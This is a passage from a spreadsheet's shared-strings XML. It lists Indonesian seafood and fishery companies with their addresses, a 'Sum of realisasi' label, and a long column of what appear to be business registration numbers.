  </si>
  <si>
    <t>PT, DUNIA MARINE PRODUCTS</t>
  </si>
  <si>
    <t>Jl, Kawasan Industri Makassar 3/K-4B, Kel, Daya, Kec, Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>CV, CAHAYA SEJAHTERA</t>
  </si>
  <si>
    <t>Jl, P, Nusa Barung Komp Niaga Malindo No,3A KIM I, Kel, Mabar, Kec, Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Jl, Kima Raya I Blok D No,2C, Kel, Daya, Kec, Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>CV, NOVIRA ABADI</t>
  </si>
  <si>
    <t>Jl, T, Nyak Makam No,04, Kel, Le Masen Kayee Adang, Kec, Syiah Kuala, Kota Banda Aceh&lt;br&gt;Aceh</t>
  </si>
  <si>
    <t>PT, DUA PUTRA UTAMA MAKMUR TBK</t>
  </si>
  <si>
    <t>Jl, Raya Pati - Juwana KM 7, Dukuh Guyangan RT 001 RW 005, Kel, Purworejo, Kec, Pati, Kabupaten Pati&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>PT, CITRADIMENSI ARTHALI</t>
  </si>
  <si>
    <t>Jl, Raya Cirebon - Bandung Km 35 Blok Pos RT 02 RW 07, Kel, Sindangwasa, Kec, Palasah, Kabupaten Majalengka&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>PT, BANDENG OERANG SEJAHTERA</t>
  </si>
  <si>
    <t>Jl, Brigjen Katamso No,24 RT 004 RW 004, Kel, Kampung Dalem, Kec, Kota, Kota Kediri&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>PT, JIREH COMMODITY</t>
  </si>
  <si>
    <t>Jl, Kima Raya 2 Komplek Kima Square Warehouse 2 Unit No,11,12,13, Kel, Daya, Kec, Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Jl, Tembero No,17, Kel, Tanggulangin, Kec, Kejayan, Kabupaten Pasuruan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>PT, REX CANNING</t>
  </si>
  <si>
    <t>Jl, Raya Beji - Bangil KM 4 No,42, Kel, Beji, Kec, Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>PT, HARAPAN MUJUR SAMUDERA</t>
  </si>
  <si>
    <t>Komplek Pelabuhan Perikanan Samudera Kendari Jl, Samudera No,1, Kel, Puday, Kec, Abeli, Kota Kendari&lt;br&gt;Sulawesi Tenggara</t>
  </si>
  <si>
    <t>PT, ALVIA TRI MANDIRI</t>
  </si>
  <si>
    <t>Komp, Prima Centre Jl, Pool PPD Blok A No,1, Kel, Kedaung Kaliangke, Kec, Cengkareng, Kota Jakarta Barat&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>CV, GIGA SAMUDRA NUSANTARA</t>
  </si>
  <si>
    <t>Jl, Patimura No,09, Kel, Kedungrejo, Kec, Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>PT, BALI TUNA SEGAR</t>
  </si>
  <si>
    <t>CV, HDT PONDO PRODUK</t>
  </si>
  <si>
    <t>Desa Karangmanggis RT 01 RW 01, Kec, Boja, Kabupaten Kendal&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Jl, Merak No,04 RT 001 RW 023, Kel, Palangka, Kec, Jekan Raya, Kota Palangka Raya&lt;br&gt;Kalimantan Tengah</t>
  </si>
  <si>
    <t>PT, HASIL MELIMPAH</t>
  </si>
  <si>
    <t>Jl, Tuna III No,5 Area Parkir Muara Baru Center, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>PT, JEMBATAN LINTAS GLOBAL</t>
  </si>
  <si>
    <t>Jl, Hatni No,200A Km 60,8, Kel, Tlogosadang, Kec, Paciran, Kabupaten Lamongan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>CV, PESONA MANDIRI</t>
  </si>
  <si>
    <t>Jl, Ikan Belanak No,01, Kel, Mayangan, Kec, Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>PT, SEAFERMART JAYA RAYA</t>
  </si>
  <si>
    <t>Jl, Cumi Raya No,3 Muara Baru, Room 302 dan 602, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Jl, Cumi Raya No,3 Muara Baru, Room 302 dan 602, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>PT, INDOBOGA JAYA MAKMUR</t>
  </si>
  <si>
    <t>Jl, Cumi Raya No,3 Muara Baru, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>CV, CAMAR LAUT</t>
  </si>
  <si>
    <t>Jl, Raja Wadi Polapa, Kel, Dulomo, Kec, Tilango, Kabupaten Gorontalo&lt;br&gt;Gorontalo</t>
  </si>
  <si>
    <t>CV, AHUAT STAR</t>
  </si>
  <si>
    <t>Jl, Jemadi Komplek Jumadi Permai No,1A, Kel, Pulo Brayan Barat II, Kec, Medan Timur, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Jl, Mahendradatta No,15E-F, Kel, Padangsambian, Kec, Denpasar Barat, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Jl, Harapan Gang Cempaka RT 03, Kel, Tungkal Harapan, Kec, Tungkal Ilir, Kabupaten Tanjung Jabung Barat&lt;br&gt;Jambi</t>
  </si>
  <si>
    <t>CV, DOLPHIN</t>
  </si>
  <si>
    <t>Jl, Khatulistiwa Km 6 No,602, Kel, Batulayang, Kec, Pontianak Utara, Kota Pontianak&lt;br&gt;Kalimantan Barat</t>
  </si>
  <si>
    <t>PT, BAHARI MULIA UTAMA</t>
  </si>
  <si>
    <t>Kawasan Industri Candi, Jl, Gatot Subroto Blok F6, Kel, Purwoyoso, Kec, Ngaliyan, Kota Semarang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Jl, Veteran KM 02, Kel, Dirgahayu, Kec, Pulau Laut Utara, Kabupaten Kota Baru&lt;br&gt;Kalimantan Selatan</t>
  </si>
  <si>
    <t>CV, BRIGHTFOOD RIUNG GUNUNG</t>
  </si>
  <si>
    <t>Jl, Cikadut Atas No,33 RT 03 RW 05, Kel, Karang Pamulang, Kec, Mandalajati, Kota Bandung&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>PT, KIRANA FOOD INTERNATIONAL</t>
  </si>
  <si>
    <t>Jl, Raya Pakah Ponco, Kel, Sumberagung, Kec, Plumpang, Kabupaten Tuban&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>PT, GLOBAL MAJU PRATAMA</t>
  </si>
  <si>
    <t>Pattene Business Park Blok H No,2, Kel, Pabentengan, Kec, Marusu, Kabupaten Maros&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>PT, JASSENDO SENTOSA MANDIRI</t>
  </si>
  <si>
    <t>Pelabuhan Perikanan Dagho, Kel, Dagho, Kec, Tamako, Kabupaten Kepulauan Sangihe&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>CV, MARVELL JAYA FISHERY</t>
  </si>
  <si>
    <t>Jl, Dermaga Baru No,8 Muara Angke, Kel, Pluit, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>PT, YOBEL UTAMA SEAFOOD INDONESIA</t>
  </si>
  <si>
    <t>Jl, Keramat Basirih No,36, Kel, Basirih, Kec, Banjarmasin Barat, Kota Banjarmasin&lt;br&gt;Kalimantan Selatan</t>
  </si>
  <si>
    <t>PT, MARINECIPTA AGUNG</t>
  </si>
  <si>
    <t>Jl, P, Nusa Barung Komp, Niaga Malindo No,3A KIM I, Kel, Mabar, Kec, Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Desa Wonokoyo, Kel, Wonokoyo, Kec, Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Jl, Kima 8 Kav, 3AI, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>PT, PRIMA BAHARI INTI LESTARI</t>
  </si>
  <si>
    <t>Jl, Kima 12 KAV-5C Makassar, Kel, Daya, Kec, Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>PT, AGRO BOGA UTAMA</t>
  </si>
  <si>
    <t>Jl, Kavling DPR No,181 RT 003 RW 004, Kel, Serua, Kec, Bojongsari, Kota Depok&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>PT, SARANA TANI PRATAMA</t>
  </si>
  <si>
    <t>Jl, KUD Mina Karya Dsn Kelapan Balian, Kel, Pengambengan, Kec, Negara, Kabupaten Jembrana&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>CV, SURYA BLAMBANGAN KENCANA</t>
  </si>
  <si>
    <t>Jl, Sampangan No,9A, Kel, Kedungrejo, Kec, Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>PT, AWINDO MAKMUR SEJAHTERA</t>
  </si>
  <si>
    <t>Jl, Cumi Raya No, 8 Muara Baru, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>PT, UTAMAKAN KEMAKMURAN RAKYAT</t>
  </si>
  <si>
    <t>Dusun Sentosa, Kel, Lekopancing, Kec, Tanralili, Kabupaten Maros&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>PT, SUMBER NELAYAN INDONESIA</t>
  </si>
  <si>
    <t>Dusun V, Kel, Sei Lunang, Kec, Sei Kepayang Timur, Kabupaten Asahan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>CV, LAUTAN MAS</t>
  </si>
  <si>
    <t>Jl, BTN Khayangan, Dusun Sandubaya Timur, Kel, Labuhan Lombok, Kec, Pringgabaya, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat</t>
  </si>
  <si>
    <t>JL,BTN Khayangan Dusun Sandubaya Timur, Kel, Labuhan Lombok, Kec, Pringgabaya, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat</t>
  </si>
  <si>
    <t>PT, TIRTA BITUNG BAHARI</t>
  </si>
  <si>
    <t>Komplek Pelabuhan Perikanan Samudera Bitung, Kel, Aertembaga Satu, Kec, Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>PT, USAHA CENTRALJAYA SAKTI</t>
  </si>
  <si>
    <t>Jl, Kima V Kav E No,3A , Kel, Daya, Kec, Biringkannaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Jl, Kima V Kav E No,3A, Kel, Daya, Kec, Biringkannaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Jl, Kima V Kav E No,3A Kel, Daya, Kec, Biringkannaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>PT, BINTANG MANDIRI BERSAUDARA</t>
  </si>
  <si>
    <t>Jl, Tandurusa Pantai Kecil, Kel, Aertembaga Dua, Kec, Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>PT, ARUMIA KHARISMA INDONESIA</t>
  </si>
  <si>
    <t>Jl, Tongkol Komplek Kantor Pelabuhan Perikanan Donggala, Kel, Labuan Bajo, Kec, Banawa, Kabupaten Donggala&lt;br&gt;Sulawesi Tengah</t>
  </si>
  <si>
    <t>PT, INDOKULINA SARANA UTAMA</t>
  </si>
  <si>
    <t>Jl, Milenium II Blok F4 No,3 Room 4, Kel, Peusar, Kec, Panongan, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>PT, SANJAYA INTERNASIONAL FISHERY</t>
  </si>
  <si>
    <t>Jl, Muara Baru Ujung Blok S Kav No,12B RT 006 RW 017, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>PT, HYDROCOLLOID INDONESIA</t>
  </si>
  <si>
    <t>Kawasan Industri Brantamulya, Jl, Tengsaw No,3 Kp, Babakan RT 004 RW 002, Kel, Tarikolot, Kec, Citeureup, Kabupaten Bogor&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>PT, MULTI MONODON INDONESIA</t>
  </si>
  <si>
    <t>Jl, Kima Raya I Blok D-2B, Kel, Kapasa, Kec, Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>PT, SABINDO RAYA GEMILANG</t>
  </si>
  <si>
    <t>Jl, Gajah Mada No,01 Kompleks TPI Tarakan, Kel, Karang Anyar Pantai, Kec, Tarakan Barat, Kota Tarakan&lt;br&gt;Kalimantan Utara</t>
  </si>
  <si>
    <t>CV, BAURA</t>
  </si>
  <si>
    <t>Jl, Raya Jati, Kel, Labuhan Lombok, Kec, Pringgabaya, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat</t>
  </si>
  <si>
    <t>Desa Rangan RT 05, Kec, Kuaro, Kabupaten Paser&lt;br&gt;Kalimantan Timur</t>
  </si>
  <si>
    <t>PT, INDOMAGURO TUNAS UNGGUL</t>
  </si>
  <si>
    <t>Jl, Muara Baru Ujung Blok G1-2, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>PT, SAMUDRA MANDIRI SENTOSA</t>
  </si>
  <si>
    <t>Jl, Wolter Mongisidi Km 5, Kel, Wangurer, Kec, Madidir, Kota Bitung&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>PT, NUANSA CIPTA MAGELLO</t>
  </si>
  <si>
    <t>Jl, Kima III Kav 5 AB, Kel, Daya, Kec, Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>PT, SUTRACO NUSANTARA MEGAH</t>
  </si>
  <si>
    <t>Pergudangan Legundi Business Park D 19A, Kel, Banjaran, Kec, Driyorejo, Kabupaten Gresik&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>CV, PUTRI DAHLIA</t>
  </si>
  <si>
    <t>Jl, Muara Baru No,01 RT 010 RW 017 (Room 4), Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>PT, KENCANA LAUT NUSANTARA</t>
  </si>
  <si>
    <t>Dermaga Muara Angke No,6 RT 001 RW 011, Kel, Pluit, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>PT, BARUNA SEGARA MANDIRI</t>
  </si>
  <si>
    <t>Jl, Raya Pelabuhan No,8, Kel, Pedungan, Kec, Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>UD, MAJU JAYA</t>
  </si>
  <si>
    <t>Dusun Gempol RT 001 RW 004, Kel, Lampah, Kec, Kedamean, Kabupaten Gresik&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>PT, USAHA LAUT PANIPAHAN</t>
  </si>
  <si>
    <t>Kawasan Pelabuhan Perikanan Muara Angke, Jl, Pendaratan Ikan No,2, Kel, Pluit, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>PT, INTIMAS SURYA</t>
  </si>
  <si>
    <t>Jl, Muara Baru Ujung Blok E No,1, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>PT, KAMILA SAMUDERA MAKMUR</t>
  </si>
  <si>
    <t>Jl, Dermaga PHPT Blok B No 3 - 4, Kel, Pluit, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>UD, SISCA</t>
  </si>
  <si>
    <t>Jl, Tukad Yeh Aya No,38, Kel, Panjer, Kec, Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>UD, GARINDO</t>
  </si>
  <si>
    <t>Jl, Sutomo Baru No,88, Kel, Pandau Hilir, Kec, Medan Perjuangan, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>PT, BUMI MENARA INTERNUSA</t>
  </si>
  <si>
    <t>Jl, Kima 15 Kavling R No,4C, Kel, Daya, Kec, Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>CV, MARWA ABADI JAYA</t>
  </si>
  <si>
    <t>Jl, Beringin I RT 09, Kel, Selumit Pantai, Kec, Tarakan Tengah, Kota Tarakan&lt;br&gt;Kalimantan Utara</t>
  </si>
  <si>
    <t>PT, MARINA LAUTAN SEJAHTERA FISHERY</t>
  </si>
  <si>
    <t>Jl, Raya Salembaran, Pergudangan Royal Kosambi Blok D6 (Room 1), Kel, Cengklong, Kec, Kosambi, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Kompleks PPP Goto, Kel, Goto, Kec, Tidore, Kota Tidore Kepulauan&lt;br&gt;Maluku Utara</t>
  </si>
  <si>
    <t>PT, SUMBER MINA SAMUDERA</t>
  </si>
  <si>
    <t>Jl, Ikan Tuna IV No, 5 Pelabuhan Benoa, Kel, Pedungan, Kec, Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>CV, SLAMET WIDODO</t>
  </si>
  <si>
    <t>Jl, Kawasan Industri Terboyo Blok N1-H, Kel, Trimulyo, Kec, Genuk, Kota Semarang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>PT, LAUTAN BAHARI SEJAHTERA</t>
  </si>
  <si>
    <t>Jl, Raya Suli Atas, Kel, Suli, Kec, Salahutu, Kabupaten Maluku Tengah&lt;br&gt;Maluku</t>
  </si>
  <si>
    <t>CV, LANDAK LAUT SEAFOOD</t>
  </si>
  <si>
    <t>Jl, Bakaran Batu 16AA, Kel, Sei Rengas Permata, Kec, Medan Area, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>CV, EAST STAR TRADING</t>
  </si>
  <si>
    <t>Jl, Pantai, Dusun Torohgusung, Kel, Santigi, Kec, Toli-Toli Utara, Kabupaten Toli-Toli&lt;br&gt;Sulawesi Tengah</t>
  </si>
  <si>
    <t>70 000</t>
  </si>
  <si>
    <t>Sum of realisasi</t>
  </si>
  <si>
    <t>8120115082332</t>
  </si>
  <si>
    <t>8120003852614</t>
  </si>
  <si>
    <t>9120005531374</t>
  </si>
  <si>
    <t>8120319081767</t>
  </si>
  <si>
    <t>8120119291599</t>
  </si>
  <si>
    <t>8120101900065</t>
  </si>
  <si>
    <t>8120015222426</t>
  </si>
  <si>
    <t>8120002912691</t>
  </si>
  <si>
    <t>8120105743719</t>
  </si>
  <si>
    <t>8120117271615</t>
  </si>
  <si>
    <t>9120204471615</t>
  </si>
  <si>
    <t>8120108840033</t>
  </si>
  <si>
    <t>8120207860013</t>
  </si>
  <si>
    <t>8120004870536</t>
  </si>
  <si>
    <t>8120202820081</t>
  </si>
  <si>
    <t>8120301830418</t>
  </si>
  <si>
    <t>8120009850712</t>
  </si>
  <si>
    <t>8120101970649</t>
  </si>
  <si>
    <t>8120009950544</t>
  </si>
  <si>
    <t>8120204982805</t>
  </si>
  <si>
    <t>8120000711862</t>
  </si>
  <si>
    <t>9120107162355</t>
  </si>
  <si>
    <t>8120212221176</t>
  </si>
  <si>
    <t>8120116081128</t>
  </si>
  <si>
    <t>8120001852996</t>
  </si>
  <si>
    <t>8120006930063</t>
  </si>
  <si>
    <t>8120006842313</t>
  </si>
  <si>
    <t>8120102950466</t>
  </si>
  <si>
    <t>8120110032667</t>
  </si>
  <si>
    <t>9120207192543</t>
  </si>
  <si>
    <t>8120004791485</t>
  </si>
  <si>
    <t>8120109782177</t>
  </si>
  <si>
    <t>8120106723018</t>
  </si>
  <si>
    <t>8120311042039</t>
  </si>
  <si>
    <t>9120003152007</t>
  </si>
  <si>
    <t>9120309382514</t>
  </si>
  <si>
    <t>8120303860223</t>
  </si>
  <si>
    <t>9120007332059</t>
  </si>
  <si>
    <t>8120212241415</t>
  </si>
  <si>
    <t>8120006810692</t>
  </si>
  <si>
    <t>0220107850531</t>
  </si>
  <si>
    <t>8120001731911</t>
  </si>
  <si>
    <t>9120306111607</t>
  </si>
  <si>
    <t>22965</t>
  </si>
  <si>
    <t>9120201121365</t>
  </si>
  <si>
    <t>8120004862383</t>
  </si>
  <si>
    <t>8120005840218</t>
  </si>
  <si>
    <t>8120108960275</t>
  </si>
  <si>
    <t>8120005871564</t>
  </si>
  <si>
    <t>8120206830312</t>
  </si>
  <si>
    <t>8120201712078</t>
  </si>
  <si>
    <t>8120007870315</t>
  </si>
  <si>
    <t>8120000821515</t>
  </si>
  <si>
    <t>8120002792833</t>
  </si>
  <si>
    <t>9120508792239</t>
  </si>
  <si>
    <t>8120002841036</t>
  </si>
  <si>
    <t>8120102972575</t>
  </si>
  <si>
    <t>8120000880915</t>
  </si>
  <si>
    <t>8120108823315</t>
  </si>
  <si>
    <t>8120210221782</t>
  </si>
  <si>
    <t>9120004171711</t>
  </si>
  <si>
    <t>8120019130395</t>
  </si>
  <si>
    <t>8120011092664</t>
  </si>
  <si>
    <t>8120008802502</t>
  </si>
  <si>
    <t>8120013210781</t>
  </si>
  <si>
    <t>8120111021183</t>
  </si>
  <si>
    <t>8120104811249</t>
  </si>
  <si>
    <t>8120006800439</t>
  </si>
  <si>
    <t>9120202591664</t>
  </si>
  <si>
    <t>9120307462397</t>
  </si>
  <si>
    <t>8120202990554</t>
  </si>
  <si>
    <t>8120119072991</t>
  </si>
  <si>
    <t>8120002881639</t>
  </si>
  <si>
    <t>8120006952712</t>
  </si>
  <si>
    <t>8120002811685</t>
  </si>
  <si>
    <t>8120000711625</t>
  </si>
  <si>
    <t>9120108170524</t>
  </si>
  <si>
    <t>8120110150174</t>
  </si>
  <si>
    <t>81200079100152</t>
  </si>
  <si>
    <t>8120001762634</t>
  </si>
  <si>
    <t>8120002762444</t>
  </si>
  <si>
    <t>8120201810775</t>
  </si>
  <si>
    <t>8120004850512</t>
  </si>
  <si>
    <t>8120114011174</t>
  </si>
  <si>
    <t>9120009291124</t>
  </si>
  <si>
    <t>8120100961141</t>
  </si>
  <si>
    <t>8120001731617</t>
  </si>
  <si>
    <t>8120004812047</t>
  </si>
  <si>
    <t>8120001840394</t>
  </si>
  <si>
    <t>9120303301223</t>
  </si>
  <si>
    <t>8120105822897</t>
  </si>
  <si>
    <t>9120104122289</t>
  </si>
  <si>
    <t>9120107151974</t>
  </si>
  <si>
    <t>9120009320172</t>
  </si>
  <si>
    <t>8120117122924</t>
  </si>
  <si>
    <t>8120001721829</t>
  </si>
  <si>
    <t>8120100961602</t>
  </si>
  <si>
    <t>9120009421389</t>
  </si>
  <si>
    <t>9120005340124</t>
  </si>
  <si>
    <t>8120213051393</t>
  </si>
  <si>
    <t>8120013052379</t>
  </si>
  <si>
    <t>8120201890372</t>
  </si>
  <si>
    <t>8120100871354</t>
  </si>
  <si>
    <t>9120405312217</t>
  </si>
  <si>
    <t>8120105870213</t>
  </si>
  <si>
    <t>0220600990038</t>
  </si>
  <si>
    <t>8120110120799</t>
  </si>
  <si>
    <t>9120002220599</t>
  </si>
  <si>
    <t>9120006451411</t>
  </si>
  <si>
    <t>8120002911383</t>
  </si>
  <si>
    <t>8120016270476</t>
  </si>
  <si>
    <t>8120004752875</t>
  </si>
  <si>
    <t>8120214100758</t>
  </si>
  <si>
    <t>9120002692877</t>
  </si>
  <si>
    <t>8120015271173</t>
  </si>
  <si>
    <t>8120205900342</t>
  </si>
  <si>
    <t>9120402382166</t>
  </si>
  <si>
    <t>9120008420453</t>
  </si>
  <si>
    <t>8120014162823</t>
  </si>
  <si>
    <t>8120115121223</t>
  </si>
  <si>
    <t>9120405311633</t>
  </si>
  <si>
    <t>9120009110584</t>
  </si>
  <si>
    <t>0068431</t>
  </si>
  <si>
    <t>8120012221859</t>
  </si>
  <si>
    <t>9120105341521</t>
  </si>
  <si>
    <t>8120100831361</t>
  </si>
  <si>
    <t>8120009890683</t>
  </si>
  <si>
    <t>9120300250548</t>
  </si>
  <si>
    <t>8120108841969</t>
  </si>
  <si>
    <t>9120205141259</t>
  </si>
  <si>
    <t>8120001852794</t>
  </si>
  <si>
    <t>8120219101125</t>
  </si>
  <si>
    <t>8120105920062</t>
  </si>
  <si>
    <t>8120102890076</t>
  </si>
  <si>
    <t>9120106312428</t>
  </si>
  <si>
    <t>9120106711308</t>
  </si>
  <si>
    <t>9120406152121</t>
  </si>
  <si>
    <t>8120103820691</t>
  </si>
  <si>
    <t>8120101932873</t>
  </si>
  <si>
    <t>8120002801796</t>
  </si>
  <si>
    <t>8120014161372</t>
  </si>
  <si>
    <t>0220100600656</t>
  </si>
  <si>
    <t>8120116180354</t>
  </si>
  <si>
    <t>9120303331349</t>
  </si>
  <si>
    <t>9120007231529</t>
  </si>
  <si>
    <t>9120003252934</t>
  </si>
  <si>
    <t>9120000342569</t>
  </si>
  <si>
    <t>8120101890393</t>
  </si>
  <si>
    <t>8120206733812</t>
  </si>
  <si>
    <t>9120106181842</t>
  </si>
  <si>
    <t>8120013012443</t>
  </si>
  <si>
    <t>9120003100178</t>
  </si>
  <si>
    <t>8120214080295</t>
  </si>
  <si>
    <t>8120202941695</t>
  </si>
  <si>
    <t>8120211191565</t>
  </si>
  <si>
    <t>8120107901875</t>
  </si>
  <si>
    <t>8120202921149</t>
  </si>
  <si>
    <t>8120101920359</t>
  </si>
  <si>
    <t>8120004812036</t>
  </si>
  <si>
    <t>8120113030328</t>
  </si>
  <si>
    <t>9120301832513</t>
  </si>
  <si>
    <t>8120312042393</t>
  </si>
  <si>
    <t>8120319012735</t>
  </si>
  <si>
    <t>9120208262812</t>
  </si>
  <si>
    <t>8120203932369</t>
  </si>
  <si>
    <t>8120010270953</t>
  </si>
  <si>
    <t>8120000890084</t>
  </si>
  <si>
    <t>8120015280138</t>
  </si>
  <si>
    <t>9120216021473</t>
  </si>
  <si>
    <t>8120216270572</t>
  </si>
  <si>
    <t>8120011281528</t>
  </si>
  <si>
    <t>8120118041591</t>
  </si>
  <si>
    <t>9120200141153</t>
  </si>
  <si>
    <t>8120009950656</t>
  </si>
  <si>
    <t>8120003713913</t>
  </si>
  <si>
    <t>9120007192192</t>
  </si>
  <si>
    <t>8120002702482</t>
  </si>
  <si>
    <t>8120101950772</t>
  </si>
  <si>
    <t>8120103853616</t>
  </si>
  <si>
    <t>8120000702928</t>
  </si>
  <si>
    <t>8120005961294</t>
  </si>
  <si>
    <t>8120216151849</t>
  </si>
  <si>
    <t>8120113012069</t>
  </si>
  <si>
    <t>8120002962402</t>
  </si>
  <si>
    <t>8120213260972</t>
  </si>
  <si>
    <t>9120108352515</t>
  </si>
  <si>
    <t>8120108841644</t>
  </si>
  <si>
    <t>9120303362805</t>
  </si>
  <si>
    <t>8120109911788</t>
  </si>
  <si>
    <t>9120307292025</t>
  </si>
  <si>
    <t>8120316002347</t>
  </si>
  <si>
    <t>8120110232884</t>
  </si>
  <si>
    <t>8120001872175</t>
  </si>
  <si>
    <t>9120116281675</t>
  </si>
  <si>
    <t>8120013162023</t>
  </si>
  <si>
    <t>8120007712953</t>
  </si>
  <si>
    <t>9120204560322</t>
  </si>
  <si>
    <t>8120013141005</t>
  </si>
  <si>
    <t>8120001830145</t>
  </si>
  <si>
    <t>8120214162693</t>
  </si>
  <si>
    <t>8120002941581</t>
  </si>
  <si>
    <t>9120105192189</t>
  </si>
  <si>
    <t>9120203171273</t>
  </si>
  <si>
    <t>8120216281732</t>
  </si>
  <si>
    <t>9120305121269</t>
  </si>
  <si>
    <t>8120014133007</t>
  </si>
  <si>
    <t>8120211190575</t>
  </si>
  <si>
    <t>8120001920549</t>
  </si>
  <si>
    <t>9120300961596</t>
  </si>
  <si>
    <t>8120105800474</t>
  </si>
  <si>
    <t>8120200840676</t>
  </si>
  <si>
    <t>8120008842543</t>
  </si>
  <si>
    <t>9120002100144</t>
  </si>
  <si>
    <t>9120108163212</t>
  </si>
  <si>
    <t>8120006851833</t>
  </si>
  <si>
    <t>8120008723616</t>
  </si>
  <si>
    <t>9120200651418</t>
  </si>
  <si>
    <t>9120403801545</t>
  </si>
  <si>
    <t>8120003751693</t>
  </si>
  <si>
    <t>8120016230314</t>
  </si>
  <si>
    <t>8120202812835</t>
  </si>
  <si>
    <t>9120104462726</t>
  </si>
  <si>
    <t>8120005842255</t>
  </si>
  <si>
    <t>8120200872086</t>
  </si>
  <si>
    <t>9120107102448</t>
  </si>
  <si>
    <t>9120000402768</t>
  </si>
  <si>
    <t>8120109970931</t>
  </si>
  <si>
    <t>8120215111256</t>
  </si>
  <si>
    <t>8120210021427</t>
  </si>
  <si>
    <t>8120109883912</t>
  </si>
  <si>
    <t>8120003910574</t>
  </si>
  <si>
    <t>8120114221245</t>
  </si>
  <si>
    <t>9120101751408</t>
  </si>
  <si>
    <t>9120208161573</t>
